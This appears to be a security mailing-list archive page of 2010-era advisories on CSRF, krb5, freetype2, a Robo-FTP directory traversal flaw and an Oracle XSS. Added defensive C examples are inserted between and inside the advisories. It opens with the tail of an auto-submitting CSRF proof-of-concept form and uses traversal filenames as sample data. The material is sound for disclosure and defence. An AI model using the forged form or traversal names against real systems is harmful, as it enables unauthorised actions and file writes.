<input type="hidden" name="MediaId" value="4f90f994-3fd0-4a02-818d-05ce325d0fb1"> <!-- this is a static value -->
<input type="hidden" name="Password" value="">
</form>
<script>
document.m.submit();
</script>
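The PoC works because the only thing the endpoint checks is a MediaId that is the same for every request, which is an identifier, not a proof that the request came from the application's own page. The following is an added example for this page, not Lara's code, showing the two checks a state-changing endpoint should apply: the Origin header must name the application, and the request must carry a per-session token compared in constant time against the one stored server-side. The `struct request`, the token value and the origins are constructed for the example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* A request as the server sees it. Field names are this example's own. */
struct request {
    const char *origin;         /* "Origin" header, NULL if absent */
    const char *form_token;     /* hidden anti-CSRF field in the POST body, NULL if absent */
    const char *session_token;  /* token issued to this session when it was created */
};

/* Constant-time comparison: the time taken does not depend on where the
 * two strings first differ, so a mismatch leaks nothing about the token. */
static int tokens_match(const char *a, const char *b) {
    size_t la = strlen(a), lb = strlen(b);
    if (la != lb)
        return 0;
    unsigned char diff = 0;
    for (size_t i = 0; i < la; i++)
        diff |= (unsigned char)(a[i] ^ b[i]);
    return diff == 0;
}

/* Returns 1 if a state-changing request may proceed, 0 if it must be
 * rejected. A forged request from another site fails the Origin check;
 * a forged request that somehow carries the right Origin still fails the
 * token check, because the attacker's page cannot read the victim's token. */
int csrf_request_allowed(const struct request *r, const char *expected_origin) {
    if (r->origin == NULL || strcmp(r->origin, expected_origin) != 0)
        return 0;
    if (r->form_token == NULL || r->session_token == NULL)
        return 0;
    if (r->form_token[0] == '\0' || r->session_token[0] == '\0')
        return 0;
    return tokens_match(r->form_token, r->session_token);
}

/* Constructed sample requests (values are placeholders, not real data). */
static const char SESSION_TOKEN[] = "example-session-token-0123456789";

static const struct request LEGITIMATE = {
    "http://host", "example-session-token-0123456789", SESSION_TOKEN };
/* The cross-site form from the PoC above: wrong Origin, no token at all. */
static const struct request FORGED_CROSS_SITE = {
    "http://attacker.example", NULL, SESSION_TOKEN };
/* Same Origin but the static MediaId from the advisory offered as a token:
 * a public, unchanging value is not a secret and must not pass. */
static const struct request FORGED_STATIC_ID = {
    "http://host", "4f90f994-3fd0-4a02-818d-05ce325d0fb1", SESSION_TOKEN };
/* Right Origin, token missing from the body. */
static const struct request MISSING_TOKEN = {
    "http://host", NULL, SESSION_TOKEN };

int main(void) {
    printf("legitimate:      %d\n", csrf_request_allowed(&LEGITIMATE, "http://host"));
    printf("cross-site form: %d\n", csrf_request_allowed(&FORGED_CROSS_SITE, "http://host"));
    printf("static id:       %d\n", csrf_request_allowed(&FORGED_STATIC_ID, "http://host"));
    printf("missing token:   %d\n", csrf_request_allowed(&MISSING_TOKEN, "http://host"));
    return 0;
}
```

Rejecting a request with no Origin header is the strict choice; if older clients that omit it must be supported, fall back to the Referer header for the same comparison and still require the token. The token itself must be unguessable (generated from a CSPRNG per session) and must never be derivable from anything the attacker's page can read.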
[ MDVSA-2010:202 ] krb5
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2010:202
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : krb5
 Date    : October 13, 2010
 Affected: 2010.1
 _______________________________________________________________________

 Problem Description:

 A vulnerability was discovered and corrected in krb5:

 The merge_authdata function in kdc_authdata.c in the Key Distribution
 Center (KDC) in MIT Kerberos 5 (aka krb5) 1.8.x before 1.8.4 does not
 properly manage an index into an authorization-data list, which allows
 remote attackers to cause a denial of service (daemon crash), or
 possibly obtain sensitive information, spoof authorization, or execute
 arbitrary code, via a TGS request, as demonstrated by a request from a
 Windows Active Directory client (CVE-2010-1322).

 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1322
 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2010-006.txt
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2010.1:
 81157bb37d800ecb35da0a3ecc28c1ff  2010.1/i586/krb5-1.8.1-5.1mdv2010.1.i586.rpm
 8c2a9907b8cefff497d7a447216d9c7b  2010.1/i586/krb5-pkinit-openssl-1.8.1-5.1mdv2010.1.i586.rpm
 346919eefb3a68b47b397a70c3d8f3e0  2010.1/i586/krb5-server-1.8.1-5.1mdv2010.1.i586.rpm
 11ee424abe5dcfa9ad6de59538230b22  2010.1/i586/krb5-server-ldap-1.8.1-5.1mdv2010.1.i586.rpm
 2ae5ec22543e8a85578537849270304a  2010.1/i586/krb5-workstation-1.8.1-5.1mdv2010.1.i586.rpm
 d239595276e0a51232d5e0b4a1250840  2010.1/i586/libkrb53-1.8.1-5.1mdv2010.1.i586.rpm
 7cd0a63672f796106e34841bd52e1734  2010.1/i586/libkrb53-devel-1.8.1-5.1mdv2010.1.i586.rpm
 1525493d2bcea9a8ec304fad469ea7d7  2010.1/SRPMS/krb5-1.8.1-5.1mdv2010.1.src.rpm

 Mandriva Linux 2010.1/X86_64:
 46b6f7ef2ea6b6ecb1d0681204ec6588  2010.1/x86_64/krb5-1.8.1-5.1mdv2010.1.x86_64.rpm
 ad909fb0cf4fb2943f427ca7eebf0fa3  2010.1/x86_64/krb5-pkinit-openssl-1.8.1-5.1mdv2010.1.x86_64.rpm
 33321047b0ce237f6c1f89a34c0996b0  2010.1/x86_64/krb5-server-1.8.1-5.1mdv2010.1.x86_64.rpm
 019440fece4e6c003e2eb1f0a23de033  2010.1/x86_64/krb5-server-ldap-1.8.1-5.1mdv2010.1.x86_64.rpm
 a8584fa57d9f9d69a8d8e42b570e5033  2010.1/x86_64/krb5-workstation-1.8.1-5.1mdv2010.1.x86_64.rpm
 e9568cee380a47ac9b5eec15747f3e4b  2010.1/x86_64/lib64krb53-1.8.1-5.1mdv2010.1.x86_64.rpm
 d1c6d2772b8218da83681a3aee8a86eb  2010.1/x86_64/lib64krb53-devel-1.8.1-5.1mdv2010.1.x86_64.rpm
 1525493d2bcea9a8ec304fad469ea7d7  2010.1/SRPMS/krb5-1.8.1-5.1mdv2010.1.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFMtdnFmqjQ0CJFipgRAmZHAJ9Ld10Yw7pIpu2SFIdDAEf1JoC27gCdEDBW
q6lJhVzePsXT7u50NY6cnkQ=
=ILfQ
-----END PGP SIGNATURE-----
Directory Traversal Vulnerability in Robo-FTP
Vulnerability ID: HTB22627
Reference: http://www.htbridge.ch/advisory/directory_traversal_vulnerability_in_robo_ftp.html
Product: Robo-FTP
Vendor: Serengeti Systems Incorporated ( http://www.robo-ftp.com )
Vulnerable Version: 3.7.3 and Probably Prior Versions
Vendor Notification: 27 September 2010
Vulnerability Type: Directory Traversal
Vulnerability Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
When exploited, this vulnerability allows an anonymous attacker to write files to specified locations on a user's system. The FTP client does not properly sanitise filenames containing directory traversal sequences that are received from an FTP server, for example a file named ..\..\..\..\..\..\..\somefile.exe. By tricking a user into downloading a directory from a malicious FTP server that contains files with backslash directory traversal sequences in their filenames, an attacker can potentially write files into the user's Startup folder to execute malicious code when the user logs on.
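The three FTP client advisories on this page (FreshFTP, AnyConnect, Robo-FTP) describe the same defect: a name chosen by the remote server is used as a local path without being reduced to a single path component. The following is an added example written for this page, not any of those clients' code, showing the check a download routine should apply to every server-supplied name before joining it to the download directory. It rejects both separator styles regardless of platform, because the client cannot know which one the local filesystem will honour. The sample listing is constructed and the function names are this example's own.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* May `name`, as received from a remote FTP server, be used as a single path
 * component inside the local download directory? Returns 1 if safe, 0 if it
 * must be rejected. The rules are strict on purpose: the server chose the
 * name, so anything that is not a plain component is refused outright
 * rather than "cleaned". */
int is_safe_remote_filename(const char *name) {
    if (name == NULL || name[0] == '\0')
        return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return 0;                                   /* current / parent directory */
    if (strchr(name, '/') != NULL || strchr(name, '\\') != NULL)
        return 0;                                   /* any separator would leave the directory */
    if (isalpha((unsigned char)name[0]) && name[1] == ':')
        return 0;                                   /* drive-relative name such as C:foo */
    for (const char *p = name; *p; p++)
        if ((unsigned char)*p < 0x20)
            return 0;                               /* control characters, including newline */
    return 1;
}

/* Build "<dir>/<name>" only after the name passes the check. Returns the
 * length written, or 0 when the name is rejected or the buffer is too small. */
size_t build_download_path(const char *dir, const char *name, char *out, size_t outsz) {
    if (!is_safe_remote_filename(name))
        return 0;
    int n = snprintf(out, outsz, "%s/%s", dir, name);
    if (n < 0 || (size_t)n >= outsz) {
        if (outsz)
            out[0] = '\0';
        return 0;
    }
    return (size_t)n;
}

/* Constructed sample listing as a malicious server might return it. */
static const char *SAMPLE_LISTING[] = {
    "report.txt",
    "..\\..\\..\\..\\..\\..\\..\\somefile.exe",      /* the pattern from the advisory */
    "../../etc/cron.d/job",                          /* the same idea with forward slashes */
    "C:somefile.exe",                                /* drive-relative on Windows */
    "notes.2010-10.txt",
};
#define SAMPLE_COUNT (sizeof SAMPLE_LISTING / sizeof SAMPLE_LISTING[0])

/* How many names in the constructed listing would be accepted. */
int count_accepted(void) {
    int ok = 0;
    for (size_t i = 0; i < SAMPLE_COUNT; i++)
        ok += is_safe_remote_filename(SAMPLE_LISTING[i]);
    return ok;
}

/* Length of the path that would be written for `name` under "downloads", 0 if refused. */
size_t path_len_for(const char *name) {
    char path[256];
    return build_download_path("downloads", name, path, sizeof path);
}

int main(void) {
    char path[256];
    for (size_t i = 0; i < SAMPLE_COUNT; i++) {
        size_t n = build_download_path("downloads", SAMPLE_LISTING[i], path, sizeof path);
        printf("%-45s -> %s\n", SAMPLE_LISTING[i], n ? path : "REJECTED");
    }
    return 0;
}
```

On Windows a complete check also has to refuse reserved device names (CON, NUL, COM1 and so on), names with a trailing dot or space, and alternate data stream suffixes ("name:stream"), none of which this example covers. The safer design is the one shown: validate, then join, and never strip or rewrite a bad name into a "fixed" one, since a sanitiser that removes one "..\" from "...\\" produces exactly the sequence it was trying to remove.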
Re: XSS in Oracle default fcgi-bin/echo
I wrote about a week ago:

Many Oracle web server installations have a fcgi-bin/echo script left over from default demo (google for inurl:fcgi-bin/echo). That script seems vulnerable to XSS. (PoC exploit and explanation of impact withheld now.)

I asked secur...@oracle.com and they said that
... this issue has been resolved in an earlier Critical Patch Update.
I looked at some recent CPU summaries, but did not notice anything relevant: maybe their reply refers to the old
http://www.kb.cert.org/vuls/id/717827
?

Website owners please remove demo software from production servers, e.g. as per Oracle recommendation
http://download.oracle.com/docs/cd/B14099_19/core.1012/b13999/checklist.htm#BABIBCIC

Oracle now told me that (they double-checked and)
The issue ... has been addressed by the fixes released in CPUJan2007.

Could someone verify whether that in fact solves the issue? Hmm... maybe difficult to verify, since I did not post a PoC test. Maybe a kind Oracle admin could point me to a patched fcgi-bin/echo? Funny if any such existed: an admin careful to keep patches up-to-date, but careless in not following security recommendations to remove...

Maybe, contact me off-list so I can provide PoC?

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia
[ MDVSA-2010:201 ] freetype2
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2010:201
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : freetype2
 Date    : October 13, 2010
 Affected: 2009.0, 2009.1, 2010.0, 2010.1, Corporate 4.0, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 A vulnerability was discovered and corrected in freetype2:

 Marc Schoenefe found an input stream position error in the way the
 FreeType font rendering engine processed input file streams. If a user
 loaded a specially-crafted font file with an application linked against
 FreeType and relevant font glyphs were subsequently rendered with the X
 FreeType library (libXft), it could cause the application to crash or,
 possibly, execute arbitrary code (integer overflow leading to heap-based
 buffer overflow in the libXft library) with the privileges of the user
 running the application. Different vulnerability than CVE-2010-1797
 (CVE-2010-3311).

 Packages for 2009.0 are provided as of the Extended Maintenance Program.
 Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490

 The updated packages have been patched to correct this issue.
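The chain the advisory names, an integer overflow that leads to a heap-based buffer overflow, is a size computation that wraps before it reaches the allocator, so the buffer is far smaller than the data later written into it. The following is an added example written for this page, not FreeType's or libXft's code: a bitmap size calculation in the unsafe 32-bit form beside an overflow-aware version that computes in a wider type and refuses anything that does not fit the field the rest of the program uses. The dimensions and function names are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* The unsafe shape: all three operands are 32-bit, so the product wraps
 * modulo 2^32 before anyone looks at it. A wrapped size buys a small heap
 * block that the later per-row writes run straight past. */
uint32_t naive_bitmap_size(uint32_t width, uint32_t rows, uint32_t bytes_per_pixel) {
    return width * rows * bytes_per_pixel;   /* wraps silently */
}

/* Overflow-aware version: widen before multiplying and refuse anything that
 * does not fit the 32-bit size field. pitch < 2^32 and rows < 2^32, so
 * their 64-bit product cannot wrap. Returns 0 with *out set, or -1 on
 * overflow or a zero-sized request. */
int checked_bitmap_size(uint32_t width, uint32_t rows, uint32_t bytes_per_pixel, uint32_t *out) {
    uint64_t pitch = (uint64_t)width * bytes_per_pixel;
    if (pitch > UINT32_MAX)
        return -1;
    uint64_t total = pitch * rows;
    if (total == 0 || total > UINT32_MAX)
        return -1;
    *out = (uint32_t)total;
    return 0;
}

/* Same check, returning 0 for "refused" so it can be used in expressions. */
uint32_t checked_size_or_zero(uint32_t width, uint32_t rows, uint32_t bytes_per_pixel) {
    uint32_t size;
    return checked_bitmap_size(width, rows, bytes_per_pixel, &size) == 0 ? size : 0;
}

/* Allocate a bitmap only when the size computation is sound. */
void *alloc_bitmap(uint32_t width, uint32_t rows, uint32_t bytes_per_pixel, uint32_t *size_out) {
    uint32_t size;
    if (checked_bitmap_size(width, rows, bytes_per_pixel, &size) != 0)
        return NULL;
    void *p = calloc(1, size);
    if (p != NULL && size_out != NULL)
        *size_out = size;
    return p;
}

int main(void) {
    /* Constructed dimensions: 65536 x 65536 x 4 is exactly 2^34 bytes, which
     * a 32-bit product reduces to 0. */
    uint32_t w = 0x10000u, r = 0x10000u, bpp = 4u;
    printf("naive size:   %u bytes\n", naive_bitmap_size(w, r, bpp));
    printf("checked size: %u bytes (0 = refused)\n", checked_size_or_zero(w, r, bpp));
    uint32_t size;
    void *bm = alloc_bitmap(640u, 480u, 4u, &size);
    printf("640x480x4: %s, %u bytes\n", bm ? "allocated" : "refused", bm ? size : 0u);
    free(bm);
    return 0;
}
```

The check belongs next to the multiplication, not at the allocation: calloc will also refuse a product that overflows size_t, but on a 64-bit build 2^34 bytes is a legal request, and the bug is that the 32-bit field the renderer later trusts says 0.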
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3311
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.0:
 248523a7d7a2c3d6a85cb88513f3a830  2009.0/i586/libfreetype6-2.3.7-1.5mdv2009.0.i586.rpm
 d732b628d679e6c1f1825fc8651dbba4  2009.0/i586/libfreetype6-devel-2.3.7-1.5mdv2009.0.i586.rpm
 eba4f60c32555f0cccee21bd1604ecdd  2009.0/i586/libfreetype6-static-devel-2.3.7-1.5mdv2009.0.i586.rpm
 9a95af00a0336bbd89965d410ecf7dbf  2009.0/SRPMS/freetype2-2.3.7-1.5mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 30127aa3b8f70207269911dc74d5d1f6  2009.0/x86_64/lib64freetype6-2.3.7-1.5mdv2009.0.x86_64.rpm
 3b6020558fbaf3651ff7c3ca13f1b7dc  2009.0/x86_64/lib64freetype6-devel-2.3.7-1.5mdv2009.0.x86_64.rpm
 0f572c7db1071b843ef103226f058bf8  2009.0/x86_64/lib64freetype6-static-devel-2.3.7-1.5mdv2009.0.x86_64.rpm
 9a95af00a0336bbd89965d410ecf7dbf  2009.0/SRPMS/freetype2-2.3.7-1.5mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 06b12f4db64361f3d7b749ea97b23573  2009.1/i586/libfreetype6-2.3.9-1.6mdv2009.1.i586.rpm
 bfe315852b8d3e9595796f9c9933694f  2009.1/i586/libfreetype6-devel-2.3.9-1.6mdv2009.1.i586.rpm
 2b493d1661300189e5551acf31822088  2009.1/i586/libfreetype6-static-devel-2.3.9-1.6mdv2009.1.i586.rpm
 2a72ac2132ed6513dd1b2f93e06364fe  2009.1/SRPMS/freetype2-2.3.9-1.6mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 9b0158596861029412f697767cfce475  2009.1/x86_64/lib64freetype6-2.3.9-1.6mdv2009.1.x86_64.rpm
 9389f0616c2633adec3ee5dc0788d0d3  2009.1/x86_64/lib64freetype6-devel-2.3.9-1.6mdv2009.1.x86_64.rpm
 da638cb0fc6f198e195fefc94ae4d052  2009.1/x86_64/lib64freetype6-static-devel-2.3.9-1.6mdv2009.1.x86_64.rpm
 2a72ac2132ed6513dd1b2f93e06364fe  2009.1/SRPMS/freetype2-2.3.9-1.6mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 81e94386ee8cd6641a46dce9df0efcae  2010.0/i586/libfreetype6-2.3.11-1.4mdv2010.0.i586.rpm
 e585d63da11b17c74f456ea97368ae97  2010.0/i586/libfreetype6-devel-2.3.11-1.4mdv2010.0.i586.rpm
 6f08eacbc92f4b8ea2e2880c97890f9e  2010.0/i586/libfreetype6-static-devel-2.3.11-1.4mdv2010.0.i586.rpm
 a1cb1cc205c73df55e5576c3d53dfe5b  2010.0/SRPMS/freetype2-2.3.11-1.4mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 8bb4d116a20020735920acdef6edb36c  2010.0/x86_64/lib64freetype6-2.3.11-1.4mdv2010.0.x86_64.rpm
 3e71bd23288d28261e6494389a945c8d  2010.0/x86_64/lib64freetype6-devel-2.3.11-1.4mdv2010.0.x86_64.rpm
 7c720ab93b651535c31fa51ff7a4062d  2010.0/x86_64/lib64freetype6-static-devel-2.3.11-1.4mdv2010.0.x86_64.rpm
 a1cb1cc205c73df55e5576c3d53dfe5b  2010.0/SRPMS/freetype2-2.3.11-1.4mdv2010.0.src.rpm

 Mandriva Linux 2010.1:
 be9c8f1b5cd2f417f0ae646bc8cbc0f2  2010.1/i586/libfreetype6-2.3.12-1.4mdv2010.1.i586.rpm
 87165bb194725472642623489e13c3d2  2010.1/i586/libfreetype6-devel-2.3.12-1.4mdv2010.1.i586.rpm
 f6b9da29780ed1c3d4192a2de2df965a  2010.1/i586/libfreetype6-static-devel-2.3.12-1.4mdv2010.1.i586.rpm
 8f9e6f8272bdd85b655f77c3bc0f1186  2010.1/SRPMS/freetype2-2.3.12-1.4mdv2010.1.src.rpm

 Mandriva Linux 2010.1/X86_64:
 426a77c1681ccb983b4421025a705622  2010.1/x86_64/lib64freetype6-2.3.12-1.4mdv2010.1.x86_64.rpm
 8847d5d1a4aa7a007e97e60dc638fcb1  2010.1/x86_64/lib64freetype6-devel-2.3.12-1.4mdv2010.1.x86_64.rpm
 1d61007c529ec3775d30fd417829590a  2010.1/x86_64/lib64freetype6-static-devel-2.3.12-1.4mdv2010.1.x86_64.rpm
 8f9e6f8272bdd85b655f77c3bc0f1186  2010.1/SRPMS/freetype2-2.3.12-1.4mdv2010.1.src.rpm

 Corporate 4.0: